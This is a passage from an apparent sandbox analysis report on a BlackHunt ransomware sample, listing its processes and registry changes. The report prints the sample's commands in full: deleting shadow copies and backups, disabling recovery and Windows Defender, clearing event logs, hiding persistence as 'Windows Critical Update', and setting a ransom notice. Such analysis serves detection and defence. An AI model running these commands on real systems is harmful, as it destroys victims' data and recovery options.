144 PID 2404 wrote to memory of 3632 2404 cmd.exe 144 PID 212 wrote to memory of 2156 212 cmd.exe 143 PID 212 wrote to memory of 2156 212 cmd.exe 143 PID 1760 wrote to memory of 2236 1760 cmd.exe 142 PID 1760 wrote to memory of 2236 1760 cmd.exe 142 PID 4424 wrote to memory of 4948 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 41 PID 4424 wrote to memory of 4948 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 41 PID 4424 wrote to memory of 532 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 140 PID 4424 wrote to memory of 532 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 140 PID 1512 wrote to memory of 3832 1512 cmd.exe 138 PID 1512 wrote to memory of 3832 1512 cmd.exe 138 PID 4948 wrote to memory of 1608 4948 cmd.exe 137 PID 4948 wrote to memory of 1608 4948 cmd.exe 137 PID 4424 wrote to memory of 3552 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 136 PID 4424 wrote to memory of 3552 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 136 PID 4424 wrote to memory of 4544 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 134 PID 4424 wrote to memory of 4544 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 134 PID 4424 wrote to memory of 3016 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 133 PID 4424 wrote to memory of 3016 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 133 PID 532 wrote to memory of 3136 532 cmd.exe 131 PID 532 wrote to memory of 3136 532 cmd.exe 131 PID 4424 wrote to memory of 5036 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 130 PID 4424 wrote to memory of 5036 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 130 PID 4424 wrote to memory of 2780 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 43 PID 4424 wrote to memory of 2780 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 43 PID 3552 wrote to memory of 2992 3552 cmd.exe 128 PID 3552 wrote to memory of 2992 3552 cmd.exe 128 PID 3016 wrote to memory of 4256 3016 cmd.exe 126 PID 3016 wrote to memory of 4256 3016 cmd.exe 126 PID 4544 wrote to memory of 800 4544 cmd.exe 125 PID 4544 wrote to memory of 800 4544 cmd.exe 125 PID 4424 wrote to memory of 628 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 124 PID 4424 wrote to memory of 628 4424 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe 124 PID 5036 wrote to memory of 4908 5036 cmd.exe 122 PID 5036 wrote to memory of 4908 5036 cmd.exe 122 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe"C:\Users\Admin\AppData\Local\Temp\5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4424 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2780
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:1220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1412
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:1840
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1604
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:5192
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4836
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:9000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1416
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:5140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:2344
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3668
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2604
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:3644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2444
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe" /F2⤵PID:4692
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:4312
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:3608
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2908
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:3188
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2920
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2200
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:400
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:980
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4568
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4728
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:628
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:5036
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3016
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4544
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3552
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:532
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1512
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:212
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:2404
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4588
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2500
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3828
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4760
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1676
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:14360
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:13224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:6820
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:5852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:14708
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:9840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:12400
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:9732
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5976
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:6408
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:8660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:8700
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:11184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:8480
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:7364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:11020
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:14500
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:7920
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:3484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:9696
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:4624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:14536
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:6876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:8964
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:9260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:7064
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:9452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:9084
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:4540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:9956
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:5496
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:8764
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:1476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:7200
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:15168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:7776
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:15264
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:11136
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:11144 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:15240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 15240 -s 14164⤵
- Program crash
PID:7004
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe"2⤵PID:15344
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:15332
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:15236
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:15160
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:1944
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:4996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:4968
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:832
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:4444
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB1⤵
- Interacts with shadow copies
PID:768
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:4208
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:4620
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded1⤵
- Interacts with shadow copies
PID:4564
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:3628
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:7964
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1896
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\5bd88ab5515edde16a468ab9ccb20952c195a522bbda8a54323c024fec09d5bd.exe" /F1⤵
- Creates scheduled task(s)
PID:3436
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5392
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f1⤵PID:2252
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1388
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f1⤵PID:3944
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:4216
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2500
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:2016
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:6388
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:1476
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:4648
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:612
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:3912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f1⤵PID:4908
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:4256
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f1⤵PID:2992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:3136
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:3832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2236
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:2156
-
